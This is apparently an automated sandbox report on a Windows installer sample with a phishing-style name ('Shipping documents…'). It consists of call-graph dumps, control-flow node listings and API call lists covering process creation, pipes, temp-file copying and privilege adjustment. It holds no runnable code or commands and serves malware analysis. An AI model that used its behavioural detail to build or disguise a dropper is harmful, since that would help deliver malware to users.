3598->3600 3599->3535 3600->3599 3601 6fe81c63 lstrcpyW 3600->3601 3602 6fe81c76 GlobalFree 3600->3602 3601->3602 3602->3599 3604 6fe81abc 3603->3604 3608 6fe81a82 3603->3608 3604->3535 3605 6fe81a8d lstrcmpiW 3605->3604 3605->3608 3608->3605 3622 6fe818cc 3608->3622 3610 6fe81163 GlobalFree 3609->3610 3611 6fe81c95 GlobalAlloc lstrcpynW 3609->3611 3610->3531 3611->3610 3613 6fe81a5e 3612->3613 3614 6fe81a13 SendMessageW SendMessageW SendMessageW 3612->3614 3613->3575 3614->3613 3616 6fe8189d 3615->3616 3617 6fe81837 3615->3617 3616->3575 3617->3616 3618 6fe818cc CharNextW 3617->3618 3618->3617 3620 6fe81953 CharNextExA 3619->3620 3621 6fe81981 3619->3621 3620->3621 3621->3575 3623 6fe818de 3622->3623 3624 6fe818da lstrlenW 3622->3624 3623->3624 3625 6fe81925 CharNextW 3623->3625 3624->3604 3624->3608 3625->3624 3626 4015a8 3627 402dab 21 API calls 3626->3627 3628 4015af SetFileAttributesW 3627->3628 3629 4015c1 3628->3629 3630 401fa9 3631 402dab 21 API calls 3630->3631 3632 401faf 3631->3632 3633 4055dc 28 API calls 3632->3633 3634 401fb9 3633->3634 3645 405b3a CreateProcessW 3634->3645 3639 401fd4 3641 401fe4 3639->3641 3642 401fd9 3639->3642 3640 402933 3644 401fe2 CloseHandle 3641->3644 3653 40649e wsprintfW 3642->3653 3644->3640 3646 401fbf 3645->3646 3647 405b6d CloseHandle 3645->3647 3646->3640 3646->3644 3648 4069f6 WaitForSingleObject 3646->3648 3647->3646 3649 406a10 3648->3649 3650 406a22 GetExitCodeProcess 3649->3650 3654 406987 3649->3654 3650->3639 3653->3644 3655 4069a4 PeekMessageW 3654->3655 3656 4069b4 WaitForSingleObject 3655->3656 3657 40699a DispatchMessageW 3655->3657 3656->3649 3657->3655 3710 40202f 3711 402dab 21 API calls 3710->3711 3712 402036 3711->3712 3713 40694b 5 API calls 3712->3713 3714 402045 GetFileVersionInfoSizeW 3713->3714 3715 402061 GlobalAlloc 3714->3715 3717 402c2f 3714->3717 3716 402075 3715->3716 3715->3717 3718 40694b 5 API calls 3716->3718 3719 40207c 3718->3719 3720 40694b 5 API calls 3719->3720 3722 402086 3720->3722 3721 4020d1 3721->3717 3722->3721 3726 40649e wsprintfW 3722->3726 3724 4020bf 3727 40649e wsprintfW 3724->3727 3726->3724 3727->3721 4789 40252f 4790 402deb 21 API calls 4789->4790 4791 402539 4790->4791 4792 402dab 21 API calls 4791->4792 4793 402542 4792->4793 4794 402933 4793->4794 4795 40254d RegQueryValueExW 4793->4795 4796 40256d 4795->4796 4799 402573 RegCloseKey 4795->4799 4796->4799 4800 40649e wsprintfW 4796->4800 4799->4794 4800->4799 4801 4021af 4802 402dab 21 API calls 4801->4802 4803 4021b6 4802->4803 4804 402dab 21 API calls 4803->4804 4805 4021c0 4804->4805 4806 402dab 21 API calls 4805->4806 4807 4021ca 4806->4807 4808 402dab 21 API calls 4807->4808 4809 4021d4 4808->4809 4810 402dab 21 API calls 4809->4810 4811 4021de 4810->4811 4812 40221d CoCreateInstance 4811->4812 4813 402dab 21 API calls 4811->4813 4816 40223c 4812->4816 4813->4812 4814 401423 28 API calls 4815 4022fb 4814->4815 4816->4814 4816->4815 3738 403532 SetErrorMode GetVersionExW 3739 403586 GetVersionExW 3738->3739 3740 4035be 3738->3740 3739->3740 3741 403615 3740->3741 3742 40694b 5 API calls 3740->3742 3743 4068db 3 API calls 3741->3743 3742->3741 3744 40362b lstrlenA 3743->3744 3744->3741 3745 40363b 3744->3745 3746 40694b 5 API calls 3745->3746 3747 403642 3746->3747 3748 40694b 5 API calls 3747->3748 3749 403649 3748->3749 3750 40694b 5 API calls 3749->3750 3751 403655 #17 OleInitialize SHGetFileInfoW 3750->3751 3826 406557 lstrcpynW 3751->3826 3754 4036a4 GetCommandLineW 3827 406557 lstrcpynW 3754->3827 3756 4036b6 3757 405e53 CharNextW 3756->3757 3758 4036dc CharNextW 3757->3758 3766 4036ee 3758->3766 3759 4037f0 3760 403804 GetTempPathW 3759->3760 3828 403501 3760->3828 3762 40381c 3763 403820 GetWindowsDirectoryW lstrcatW 3762->3763 3764 403876 DeleteFileW 3762->3764 3767 403501 12 API calls 3763->3767 3838 403082 GetTickCount GetModuleFileNameW 3764->3838 3765 405e53 CharNextW 3765->3766 3766->3759 3766->3765 3772 4037f2 3766->3772 3769 40383c 3767->3769 3769->3764 3771 403840 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3769->3771 3770 40388a 3778 405e53 CharNextW 3770->3778 3809 403931 3770->3809 3817 403941 3770->3817 3773 403501 12 API calls 3771->3773 3922 406557 lstrcpynW 3772->3922 3776 40386e 3773->3776 3776->3764 3776->3817 3783 4038a9 3778->3783 3780 403ab3 3784 403b37 ExitProcess 3780->3784 3785 403abb GetCurrentProcess OpenProcessToken 3780->3785 3781 403a8f 3782 405bb7 MessageBoxIndirectW 3781->3782 3789 403a9d ExitProcess 3782->3789 3786 403907 3783->3786 3787 40394a 3783->3787 3790 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 3785->3790 3791 403b07 3785->3791 3793 405f2e 18 API calls 3786->3793 3794 405b22 5 API calls 3787->3794 3790->3791 3792 40694b 5 API calls 3791->3792 3796 403b0e 3792->3796 3797 403913 3793->3797 3795 40394f lstrlenW 3794->3795 3925 406557 lstrcpynW 3795->3925 3799 403b23 ExitWindowsEx 3796->3799 3801 403b30 3796->3801 3797->3817 3923 406557 lstrcpynW 3797->3923 3799->3784 3799->3801 3800 403969 3803 403981 3800->3803 3926 406557 lstrcpynW 3800->3926 3934 40140b 3801->3934 3808 4039a7 wsprintfW 3803->3808 3823 4039d3 3803->3823 3805 403926 3924 406557 lstrcpynW 3805->3924 3810 406594 21 API calls 3808->3810 3866 403c29 3809->3866 3810->3803 3811 405aab 2 API calls 3811->3823 3812 405b05 2 API calls 3812->3823 3813 4039e3 GetFileAttributesW 3815 4039ef DeleteFileW 3813->3815 3813->3823 3814 403a1d SetCurrentDirectoryW 3816 406317 40 API calls 3814->3816 3815->3823 3818 403a2c CopyFileW 3816->3818 3927 403b4f 3817->3927 3818->3817 3818->3823 3819 405c63 71 API calls 3819->3823 3820 406317 40 API calls 3820->3823 3821 406594 21 API calls 3821->3823 3822 405b3a 2 API calls 3822->3823 3823->3803 3823->3808 3823->3811 3823->3812 3823->3813 3823->3814 3823->3817 3823->3819 3823->3820 3823->3821 3823->3822 3824 403aa5 CloseHandle 3823->3824 3825 4068b4 2 API calls 3823->3825 3824->3817 3825->3823 3826->3754 3827->3756 3829 406805 5 API calls 3828->3829 3830 40350d 3829->3830 3831 403517 3830->3831 3832 405e26 3 API calls 3830->3832 3831->3762 3833 40351f 3832->3833 3834 405b05 2 API calls 3833->3834 3835 403525 3834->3835 3836 406076 2 API calls 3835->3836 3837 403530 3836->3837 3837->3762 3937 406047 GetFileAttributesW CreateFileW 3838->3937 3840 4030c2 3861 4030d2 3840->3861 3938 406557 lstrcpynW 3840->3938 3842 4030e8 3843 405e72 2 API calls 3842->3843 3844 4030ee 3843->3844 3939 406557 lstrcpynW 3844->3939 3846 4030f9 GetFileSize 3847 4031f3 3846->3847 3859 403110 3846->3859 3940 40301e 3847->3940 3849 4031fc 3851 40322c GlobalAlloc 3849->3851 3849->3861 3952 4034ea SetFilePointer 3849->3952 3850 4034d4 ReadFile 3850->3859 3951 4034ea SetFilePointer 3851->3951 3853 40325f 3857 40301e 6 API calls 3853->3857 3855 403215 3858 4034d4 ReadFile 3855->3858 3856 403247 3860 4032b9 35 API calls 3856->3860 3857->3861 3862 403220 3858->3862 3859->3847 3859->3850 3859->3853 3859->3861 3863 40301e 6 API calls 3859->3863 3864 403253 3860->3864 3861->3770 3862->3851 3862->3861 3863->3859 3864->3861 3864->3864 3865 403290 SetFilePointer 3864->3865 3865->3861 3867 40694b 5 API calls 3866->3867 3868 403c3d 3867->3868 3869 403c43 3868->3869 3870 403c55 3868->3870 3968 40649e wsprintfW 3869->3968 3871 406425 3 API calls 3870->3871 3872 403c85 3871->3872 3874 403ca4 lstrcatW 3872->3874 3876 406425 3 API calls 3872->3876 3875 403c53 3874->3875 3953 403eff 3875->3953 3876->3874 3879 405f2e 18 API calls 3880 403cd6 3879->3880 3881 403d6a 3880->3881 3883 406425 3 API calls 3880->3883 3882 405f2e 18 API calls 3881->3882 3884 403d70 3882->3884 3885 403d08 3883->3885 3886 403d80 LoadImageW 3884->3886 3887 406594 21 API calls 3884->3887 3885->3881 3890 403d29 lstrlenW 3885->3890 3894 405e53 CharNextW 3885->3894 3888 403e26 3886->3888 3889 403da7 RegisterClassW 3886->3889 3887->3886 3893 40140b 2 API calls 3888->3893 3891 403e30 3889->3891 3892 403ddd SystemParametersInfoW CreateWindowExW 3889->3892 3895 403d37 lstrcmpiW 3890->3895 3896 403d5d 3890->3896 3891->3817 3892->3888 3897 403e2c 3893->3897 3898 403d26 3894->3898 3895->3896 3899 403d47 GetFileAttributesW 3895->3899 3900 405e26 3 API calls 3896->3900 3897->3891 3902 403eff 22 API calls 3897->3902 3898->3890 3901 403d53 3899->3901 3903 403d63 3900->3903 3901->3896 3905 405e72 2 API calls 3901->3905 3906 403e3d 3902->3906 3969 406557 lstrcpynW 3903->3969 3905->3896 3907 403e49 ShowWindow 3906->3907 3908 403ecc 3906->3908 3909 4068db 3 API calls 3907->3909 3961 4056af OleInitialize 3908->3961 3911 403e61 3909->3911 3913 403e6f GetClassInfoW 3911->3913 3916 4068db 3 API calls 3911->3916 3912 403ed2 3914 403ed6 3912->3914 3915 403eee 3912->3915 3918 403e83 GetClassInfoW RegisterClassW 3913->3918 3919 403e99 DialogBoxParamW 3913->3919 3914->3891 3920 40140b 2 API calls 3914->3920 3917 40140b 2 API calls 3915->3917 3916->3913 3917->3891 3918->3919 3921 40140b 2 API calls 3919->3921 3920->3891 3921->3891 3922->3760 3923->3805 3924->3809 3925->3800 3926->3803 3928 403b67 3927->3928 3929 403b59 CloseHandle 3927->3929 3981 403b94 3928->3981 3929->3928 3932 405c63 71 API calls 3933 403a82 OleUninitialize 3932->3933 3933->3780 3933->3781 3935 401389 2 API calls 3934->3935 3936 401420 3935->3936 3936->3784 3937->3840 3938->3842 3939->3846 3941 403027 3940->3941 3942 40303f 3940->3942 3943 403030 DestroyWindow 3941->3943 3944 403037 3941->3944 3945 403047 3942->3945 3946 40304f GetTickCount 3942->3946 3943->3944 3944->3849 3949 406987 2 API calls 3945->3949 3947 403080 3946->3947 3948 40305d CreateDialogParamW ShowWindow 3946->3948 3947->3849 3948->3947 3950 40304d 3949->3950 3950->3849 3951->3856 3952->3855 3954 403f13 3953->3954 3970 40649e wsprintfW 3954->3970 3956 403f84 3971 403fb8 3956->3971 3958 403cb4 3958->3879 3959 403f89 3959->3958 3960 406594 21 API calls 3959->3960 3960->3959 3974 404522 3961->3974 3963 4056d2 3967 4056f9 3963->3967 3977 401389 3963->3977 3964 404522 SendMessageW 3965 40570b OleUninitialize 3964->3965 3965->3912 3967->3964 3968->3875 3969->3881 3970->3956 3972 406594 21 API calls 3971->3972 3973 403fc6 SetWindowTextW 3972->3973 3973->3959 3975 40453a 3974->3975 3976 40452b SendMessageW 3974->3976 3975->3963 3976->3975 3979 401390 3977->3979 3978 4013fe 3978->3963 3979->3978 3980 4013cb MulDiv SendMessageW 3979->3980 3980->3979 3982 403ba2 3981->3982 3983 403ba7 FreeLibrary GlobalFree 3982->3983 3984 403b6c 3982->3984 3983->3983 3983->3984 3984->3932 4817 401a35 4818 402dab 21 API calls 4817->4818 4819 401a3e ExpandEnvironmentStringsW 4818->4819 4820 401a52 4819->4820 4822 401a65 4819->4822 4821 401a57 lstrcmpW 4820->4821 4820->4822 4821->4822 4828 4023b7 4829 4023c5 4828->4829 4830 4023bf 4828->4830 4832 4023d3 4829->4832 4833 402dab 21 API calls 4829->4833 4831 402dab 21 API calls 4830->4831 4831->4829 4834 402dab 21 API calls 4832->4834 4836 4023e1 4832->4836 4833->4832 4834->4836 4835 402dab 21 API calls 4837 4023ea WritePrivateProfileStringW 4835->4837 4836->4835 4838 4014b8 4839 4014be 4838->4839 4840 401389 2 API calls 4839->4840 4841 4014c6 4840->4841 4122 402439 4123 402441 4122->4123 4124 40246c 4122->4124 4126 402deb 21 API calls 4123->4126 4125 402dab 21 API calls 4124->4125 4127 402473 4125->4127 4128 402448 4126->4128 4134 402e69 4127->4134 4130 402452 4128->4130 4133 402480 4128->4133 4131 402dab 21 API calls 4130->4131 4132 402459 RegDeleteValueW RegCloseKey 4131->4132 4132->4133 4135 402e76 4134->4135 4136 402e7d 4134->4136 4135->4133 4136->4135 4138 402eae 4136->4138 4139 4063c4 RegOpenKeyExW 4138->4139 4140 402edc 4139->4140 4141 402f91 4140->4141 4142 402ee6 4140->4142 4141->4135 4143 402eec RegEnumValueW 4142->4143 4152 402f0f 4142->4152 4144 402f76 RegCloseKey 4143->4144 4143->4152 4144->4141 4145 402f4b RegEnumKeyW 4146 402f54 RegCloseKey 4145->4146 4145->4152 4147 40694b 5 API calls 4146->4147 4148 402f64 4147->4148 4150 402f86 4148->4150 4151 402f68 RegDeleteKeyW 4148->4151 4149 402eae 6 API calls 4149->4152 4150->4141 4151->4141 4152->4144 4152->4145 4152->4146 4152->4149 4153 40173a 4154 402dab 21 API calls 4153->4154 4155 401741 SearchPathW 4154->4155 4156 40175c 4155->4156 4842 401d3d 4843 402d89 21 API calls 4842->4843 4844 401d44 4843->4844 4845 402d89 21 API calls 4844->4845 4846 401d50 GetDlgItem 4845->4846 4847 40263d 4846->4847

                                        Executed Functions

                                        Function 6FE81096 Relevance: 116.1, APIs: 56, Strings: 10, Instructions: 627filestringmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 6fe81096-6fe810e2 call 6fe81987 3 6fe810e8-6fe8112c GetModuleFileNameW GlobalAlloc 0->3 4 6fe8122d-6fe81244 GlobalAlloc 0->4 5 6fe8112f-6fe81133 3->5 6 6fe81247-6fe8125d 4->6 7 6fe8114f-6fe81157 5->7 8 6fe81135-6fe8114d CharPrevW 5->8 9 6fe8127e 6->9 10 6fe8125f-6fe81279 FindWindowExW * 2 6->10 11 6fe81159-6fe8116a call 6fe81c8c GlobalFree 7->11 12 6fe8116f-6fe811a0 GetTempFileNameW 7->12 8->5 8->7 13 6fe81284-6fe81299 call 6fe81c4c call 6fe81a61 9->13 10->9 19 6fe81825-6fe81829 11->19 21 6fe8120b-6fe8122b lstrcatW lstrlenW 12->21 22 6fe811a2-6fe811d5 CreateFileMappingW MapViewOfFile 12->22 24 6fe812aa-6fe812b4 lstrcmpiW 13->24 25 6fe8129b-6fe812a8 call 6fe81ac7 13->25 21->6 30 6fe811fd-6fe81205 CloseHandle * 2 22->30 31 6fe811d7-6fe811f7 UnmapViewOfFile 22->31 28 6fe812bf-6fe812c9 lstrcmpiW 24->28 29 6fe812b6-6fe812bd 24->29 32 6fe812d2-6fe812d5 25->32 33 6fe812cb 28->33 34 6fe812d7-6fe812da 28->34 29->32 30->21 31->30 32->13 33->32 36 6fe81308-6fe8138e GetVersion 34->36 37 6fe812dc-6fe812ec call 6fe81c8c 34->37 39 6fe81390-6fe81393 36->39 40 6fe813c7-6fe813d3 36->40 49 6fe812ee 37->49 50 6fe812f2-6fe812f5 37->50 44 6fe8139e 39->44 45 6fe81395-6fe8139c 39->45 41 6fe813fe-6fe81415 CreatePipe 40->41 42 6fe813d5-6fe813fb InitializeSecurityDescriptor SetSecurityDescriptorDacl 40->42 47 6fe81484-6fe81496 lstrcpyW 41->47 48 6fe81417-6fe81428 CreatePipe 41->48 42->41 46 6fe813a3-6fe813be GlobalAlloc 44->46 45->46 46->47 51 6fe813c4 46->51 53 6fe81762-6fe81765 47->53 48->47 52 6fe8142a-6fe81482 GetStartupInfoW CreateProcessW 48->52 49->50 54 6fe81300 50->54 55 6fe812f7-6fe812fa DeleteFileW 50->55 51->40 52->47 58 6fe8149b-6fe814a1 GetTickCount 52->58 56 6fe8176f-6fe81772 53->56 57 6fe81767-6fe8176a call 6fe81c8c 53->57 54->36 55->54 60 6fe81774-6fe8177a 56->60 61 6fe81787-6fe8178e 56->61 57->56 62 6fe814a4-6fe814be WaitForSingleObject GetExitCodeProcess 58->62 60->61 63 6fe8177c-6fe81786 call 6fe81a01 60->63 64 6fe81790-6fe8179c lstrcpyW 61->64 65 6fe817a2-6fe817a9 61->65 66 6fe814c4-6fe814d8 PeekNamedPipe 62->66 63->61 64->65 68 6fe817ab-6fe817c0 wsprintfW 65->68 69 6fe817c3-6fe817fc call 6fe81c8c CloseHandle * 6 65->69 70 6fe8170a-6fe8170d 66->70 71 6fe814de-6fe8151e GetTickCount ReadFile 66->71 68->69 86 6fe817fe 69->86 87 6fe81802-6fe81805 69->87 73 6fe8175f 70->73 74 6fe8170f-6fe81714 70->74 76 6fe81538-6fe8153b 71->76 77 6fe81520-6fe81522 71->77 73->53 78 6fe8174a-6fe81752 Sleep 74->78 79 6fe81716-6fe81723 GetTickCount 74->79 82 6fe81541-6fe81544 76->82 83 6fe81757-6fe8175a 76->83 77->76 81 6fe81524-6fe81535 IsTextUnicode 77->81 78->62 79->78 85 6fe81725-6fe81745 TerminateProcess lstrcpyW 79->85 81->76 82->62 84 6fe8154a-6fe81555 82->84 83->62 90 6fe81557-6fe81567 84->90 85->62 86->87 88 6fe81810-6fe8181e GlobalFree 87->88 89 6fe81807-6fe8180a DeleteFileW 87->89 88->19 91 6fe81820-6fe81823 GlobalFree 88->91 89->88 90->66 92 6fe8156d-6fe81570 90->92 91->19 93 6fe81592-6fe81595 92->93 94 6fe81572-6fe81576 92->94 96 6fe815cc 93->96 97 6fe81597-6fe815a5 IsDBCSLeadByteEx 93->97 94->66 95 6fe8157c-6fe8157f 94->95 98 6fe8158d-6fe81590 95->98 99 6fe81581-6fe8158b 95->99 102 6fe815d0-6fe815d6 96->102 100 6fe815b6-6fe815ca MultiByteToWideChar 97->100 101 6fe815a7-6fe815b0 97->101 98->90 99->102 103 6fe815d7-6fe815dc 100->103 101->66 101->100 102->103 104 6fe8160a-6fe8160f 103->104 105 6fe815de-6fe815e1 103->105 106 6fe81611-6fe81614 104->106 107 6fe81616-6fe8161b 104->107 108 6fe8163b-6fe8163d 105->108 109 6fe815e3-6fe815e6 105->109 106->107 112 6fe8165d-6fe81668 106->112 107->108 113 6fe8161d-6fe81620 107->113 111 6fe8166d-6fe81670 108->111 114 6fe8163f-6fe81643 108->114 110 6fe815ec-6fe81608 lstrcpyW 109->110 109->111 110->112 117 6fe816a9-6fe816b3 111->117 118 6fe81672-6fe8168e GlobalReAlloc 111->118 112->90 113->108 115 6fe81622-6fe81639 call 6fe81a01 113->115 114->112 116 6fe81645-6fe81658 114->116 115->112 116->116 122 6fe8165a 116->122 119 6fe816d3-6fe816ea call 6fe81948 117->119 120 6fe816b5-6fe816c6 call 6fe8182a 117->120 123 6fe816ec-6fe81705 lstrcpyW 118->123 124 6fe81690-6fe816a4 118->124 128 6fe816cb-6fe816ce 119->128 120->128 122->112 123->62 124->84 128->62
                                        APIs
                                          • Part of subcall function 6FE81987: GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,6FE810E0), ref: 6FE81990
                                          • Part of subcall function 6FE81987: GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,6FE810E0), ref: 6FE8199E
                                          • Part of subcall function 6FE81987: GetProcAddress.KERNEL32(00000000,?), ref: 6FE819BD
                                        • GetModuleFileNameW.KERNEL32(?,00000104), ref: 6FE810FA
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6FE81112
                                        • CharPrevW.USER32(?,?), ref: 6FE8113D
                                        • GlobalFree.KERNEL32(00000000), ref: 6FE81164
                                        • GetTempFileNameW.KERNEL32(?,6FE83088,00000000,?), ref: 6FE81182
                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 6FE81198
                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 6FE811B0
                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 6FE811BF
                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 6FE811CD
                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 6FE811F7
                                        • CloseHandle.KERNEL32(00000000), ref: 6FE811FE
                                        • CloseHandle.KERNEL32(00000000), ref: 6FE81205
                                        • lstrcatW.KERNEL32(?,6FE83084), ref: 6FE81214
                                        • lstrlenW.KERNEL32(?), ref: 6FE8121B
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6FE8123C
                                        • FindWindowExW.USER32(000103E6,00000000,#32770,00000000), ref: 6FE81274
                                        • FindWindowExW.USER32(00000000), ref: 6FE81277
                                        • lstrcmpiW.KERNEL32(00000000,/OEM,00000000), ref: 6FE812B0
                                        • lstrcmpiW.KERNEL32(00000000,/MBCS), ref: 6FE812C5
                                        • DeleteFileW.KERNEL32(?,error), ref: 6FE812FA
                                        • GetVersion.KERNEL32 ref: 6FE81340
                                        • GlobalAlloc.KERNEL32(00000040,00000FFE), ref: 6FE813B0
                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 6FE813DE
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 6FE813EF
                                        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 6FE81411
                                        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 6FE81424
                                        • GetStartupInfoW.KERNEL32(00000044), ref: 6FE81431
                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,?), ref: 6FE8147A
                                        • lstrcpyW.KERNEL32(?,error), ref: 6FE81490
                                        • GetTickCount.KERNEL32 ref: 6FE8149B
                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 6FE814AB
                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 6FE814BE
                                        • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 6FE814CF
                                        • GetTickCount.KERNEL32 ref: 6FE814DE
                                        • ReadFile.KERNEL32(?,00000000,00000400,?,00000000), ref: 6FE81503
                                        • IsTextUnicode.ADVAPI32(6FE830B8,?,00000000), ref: 6FE81529
                                        • IsDBCSLeadByteEx.KERNEL32(?,?), ref: 6FE8159D
                                        • MultiByteToWideChar.KERNEL32(?,00000000,6FE830B8,00000001,?,00000002), ref: 6FE815C4
                                        • lstrcpyW.KERNEL32(?, ), ref: 6FE815F4
                                        • GlobalReAlloc.KERNEL32(00000002,00000402,00000042), ref: 6FE81686
                                          • Part of subcall function 6FE81948: CharNextExA.USER32(?,0000000A,00000000,6FE830B8,?,6FE816EA,?,00000002,00000002,0000000A), ref: 6FE81974
                                        • lstrcpyW.KERNEL32(?,error), ref: 6FE816F8
                                        • GetTickCount.KERNEL32 ref: 6FE81716
                                        • TerminateProcess.KERNEL32(?,000000FF), ref: 6FE8172D
                                        • lstrcpyW.KERNEL32(?,timeout), ref: 6FE8173F
                                        • Sleep.KERNELBASE(00000064), ref: 6FE8174C
                                        • lstrcpyW.KERNEL32(?,error), ref: 6FE8179C
                                        • wsprintfW.USER32 ref: 6FE817BA
                                        • CloseHandle.KERNEL32(?,?), ref: 6FE817D8
                                        • CloseHandle.KERNEL32(?), ref: 6FE817E0
                                        • CloseHandle.KERNEL32(?), ref: 6FE817E5
                                        • CloseHandle.KERNEL32(?), ref: 6FE817EA
                                        • CloseHandle.KERNEL32(?), ref: 6FE817EF
                                        • CloseHandle.KERNEL32(?), ref: 6FE817F4
                                        • DeleteFileW.KERNEL32(?), ref: 6FE8180A
                                        • GlobalFree.KERNEL32(?), ref: 6FE81819
                                        • GlobalFree.KERNEL32(00000002), ref: 6FE81823
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2153670485.000000006FE81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE80000, based on PE: true
                                        • Associated: 00000000.00000002.2153651950.000000006FE80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.2153686664.000000006FE82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.2153704607.000000006FE83000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.2153723885.000000006FE84000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fe80000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: File$Handle$Close$Global$Createlstrcpy$AllocProcess$CharCountFreePipeTick$ByteDeleteDescriptorFindModuleNameSecurityViewWindowlstrcmpi$AddressCodeCopyCurrentDaclExitInfoInitializeLeadMappingMultiNamedNextObjectPeekPrevProcReadSingleSleepStartupTempTerminateTextUnicodeUnmapVersionWaitWidelstrcatlstrlenwsprintf
                                        • String ID: $#32770$/MBCS$/OEM$/TIMEOUT=$@1#v7#v$D$SysListView32$error$timeout
                                        • API String ID: 351676774-3132266245
                                        • Opcode ID: a38aa098b078caa8aa6c23147e333e181a63814e3907cceebc7e4e8fa082e320
                                        • Instruction ID: 95267072ebd86fe360c834f1347fa03b8c3bb0d94588a80c7e4ef3d735d01618
                                        • Opcode Fuzzy Hash: a38aa098b078caa8aa6c23147e333e181a63814e3907cceebc7e4e8fa082e320
                                        • Instruction Fuzzy Hash: 7E321571800219EFDF11AFE4C984ADEBFBAFF0A354F20416AE529A7250D7349A85CF50
                                        Function 00403532 Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464stringfilecomCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 130 403532-403584 SetErrorMode GetVersionExW 131 403586-4035b6 GetVersionExW 130->131 132 4035be-4035c3 130->132 131->132 133 4035c5 132->133 134 4035cb-40360d 132->134 133->134 135 403620 134->135 136 40360f-403617 call 40694b 134->136 138 403625-403639 call 4068db lstrlenA 135->138 136->135 141 403619 136->141 143 40363b-403657 call 40694b * 3 138->143 141->135 150 403668-4036cc #17 OleInitialize SHGetFileInfoW call 406557 GetCommandLineW call 406557 143->150 151 403659-40365f 143->151 158 4036d5-4036e9 call 405e53 CharNextW 150->158 159 4036ce-4036d0 150->159 151->150 155 403661 151->155 155->150 162 4037e4-4037ea 158->162 159->158 163 4037f0 162->163 164 4036ee-4036f4 162->164 167 403804-40381e GetTempPathW call 403501 163->167 165 4036f6-4036fb 164->165 166 4036fd-403704 164->166 165->165 165->166 168 403706-40370b 166->168 169 40370c-403710 166->169 174 403820-40383e GetWindowsDirectoryW lstrcatW call 403501 167->174 175 403876-403890 DeleteFileW call 403082 167->175 168->169 171 4037d1-4037e0 call 405e53 169->171 172 403716-40371c 169->172 171->162 190 4037e2-4037e3 171->190 177 403736-40376f 172->177 178 40371e-403725 172->178 174->175 194 403840-403870 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403501 174->194 196 403896-40389c 175->196 197 403a7d-403a8d call 403b4f OleUninitialize 175->197 184 403771-403776 177->184 185 40378c-4037c6 177->185 182 403727-40372a 178->182 183 40372c 178->183 182->177 182->183 183->177 184->185 191 403778-403780 184->191 187 4037c8-4037cc 185->187 188 4037ce-4037d0 185->188 187->188 195 4037f2-4037ff call 406557 187->195 188->171 190->162 192 403782-403785 191->192 193 403787 191->193 192->185 192->193 193->185 194->175 194->197 195->167 200 4038a2-4038ad call 405e53 196->200 201 403935-40393c call 403c29 196->201 207 403ab3-403ab9 197->207 208 403a8f-403a9f call 405bb7 ExitProcess 197->208 212 4038fb-403905 200->212 213 4038af-4038e4 200->213 210 403941-403945 201->210 214 403b37-403b3f 207->214 215 403abb-403ad1 GetCurrentProcess OpenProcessToken 207->215 210->197 216 403907-403915 call 405f2e 212->216 217 40394a-403970 call 405b22 lstrlenW call 406557 212->217 221 4038e6-4038ea 213->221 218 403b41 214->218 219 403b45-403b49 ExitProcess 214->219 222 403ad3-403b01 LookupPrivilegeValueW AdjustTokenPrivileges 215->222 223 403b07-403b15 call 40694b 215->223 216->197 236 40391b-403931 call 406557 * 2 216->236 240 403981-403999 217->240 241 403972-40397c call 406557 217->241 218->219 227 4038f3-4038f7 221->227 228 4038ec-4038f1 221->228 222->223 234 403b23-403b2e ExitWindowsEx 223->234 235 403b17-403b21 223->235 227->221 230 4038f9 227->230 228->227 228->230 230->212 234->214 238 403b30-403b32 call 40140b 234->238 235->234 235->238 236->201 238->214 246 40399e-4039a2 240->246 241->240 248 4039a7-4039d1 wsprintfW call 406594 246->248 252 4039d3-4039d8 call 405aab 248->252 253 4039da call 405b05 248->253 257 4039df-4039e1 252->257 253->257 258 4039e3-4039ed GetFileAttributesW 257->258 259 403a1d-403a3c SetCurrentDirectoryW call 406317 CopyFileW 257->259 260 403a0e-403a19 258->260 261 4039ef-4039f8 DeleteFileW 258->261 267 403a7b 259->267 268 403a3e-403a5f call 406317 call 406594 call 405b3a 259->268 260->246 264 403a1b 260->264 261->260 263 4039fa-403a0c call 405c63 261->263 263->248 263->260 264->197 267->197 276 403a61-403a6b 268->276 277 403aa5-403ab1 CloseHandle 268->277 276->267 278 403a6d-403a75 call 4068b4 276->278 277->267 278->248 278->267
                                        APIs
                                        • SetErrorMode.KERNELBASE ref: 00403555
                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
